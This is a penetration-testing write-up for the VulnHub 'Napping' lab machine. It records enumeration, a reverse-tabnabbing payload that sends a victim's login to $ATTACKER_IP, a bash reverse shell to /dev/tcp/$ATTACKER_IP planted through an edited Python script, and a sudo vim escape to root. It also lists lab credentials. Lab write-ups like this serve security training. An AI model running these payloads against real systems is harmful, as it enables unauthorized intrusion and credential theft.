# VulnHub: Napping 1.0.1
## OS:
## Web-Technology:

## IP: 10.8.8.101

## USERS:
- daniel

## CREDENTIALS (ANY):
- SYSTEM
    - daniel : C@ughtm3napping123

- DATABASE
```php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');
```

---

## Community Attack Vectors (To-Try List):
- 22 SSH &rarr; daniel : C@ughtm3napping123
- 80 HTTP &rarr; Fuzzing Files/Directories (Web Root) &rarr; Manual Enumeration &rarr; Nikto &rarr; robots.txt, .DS_STORE, .svn

---

## NMAP RESULTS:
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set ← httponly flag prevents XSS attacks
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

---

## Web Services Enumeration:

### [ + NIKTO ]


### [ + WFUZZ ]


#### FILES:
```
/ (Web Root)
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        37 L     82 W       1220 Ch     "index.php"
000000010:   200        41 L     104 W      1567 Ch     "register.php"
000000072:   200        0 L      0 W        0 Ch        "config.php"
000000156:   302        0 L      0 W        0 Ch        "logout.php"
```

#### DIRECTORIES:
```
/ (Web Root)
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000386:   403        9 L      28 W       275 Ch      "icons"
000004227:   403        9 L      28 W       275 Ch      "server-status"


=========================================================================
```

#### OTHER:
##### VULNERABILITY
• target="_blank"
   ◇ page you are linking gains partial access to the source page via the window.opener object

##### EXPLOIT
- send link to html page (with payload)
- payload
    - form
        - action='$ATTACKER_IP'
        - on submission of form, post data sent to $ATTACKER_IP
    - script
        - on click of link, information retrieved
```js
if(window.opener) window.opener.parent.location.replace('$ATTACKER_IP');
```

```js
if(window.opener != window) window.opener.parent.location.replace('$ATTACKER_IP');
```

- setup netcat listenter

##### RESULT
```
connect to [10.8.8.102] from (UNKNOWN) [10.8.8.101] 48442
POST / HTTP/1.1
Host: 10.8.8.102:8888
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123
```

---

## PRIV-ESC:

### Lateral Escalation (daniel → adrian)
- /home/adrian/query.py
    - has administrator group
    - lateral escaltion to user adrian
    - edit query.py to run reverse shell payload
```python
import os
os.system("bash -c '/var/temp/hacker.sh'")
```
- hacker.sh
```bash
#!/bin/bash
bash -c ‘bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1’
```

### Privilege Escalation (adrian → root)
```bash
sudo -l

Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim
```

- VIM privilege escalation
```bash
sudo /usr/bin/vim <ANY_FILE_NAME>

:set shell=/bin/sh
:shell
```

### PROOF
/root/root.txt
```
Admins just can't stay awake tsk tsk tsk
```

### RESULTS (Screenshot: Ctrl+Alt+Shift+R)
```bash
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:49:ee:4d brd ff:ff:ff:ff:ff:ff
    inet 10.8.8.101/24 brd 10.8.8.255 scope global dynamic enp0s3
       valid_lft 506sec preferred_lft 506sec
    inet6 fe80::a00:27ff:fe49:ee4d/64 scope link 
       valid_lft forever preferred_lft forever
hostname
napping
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
```

---

## Take Away Concepts:
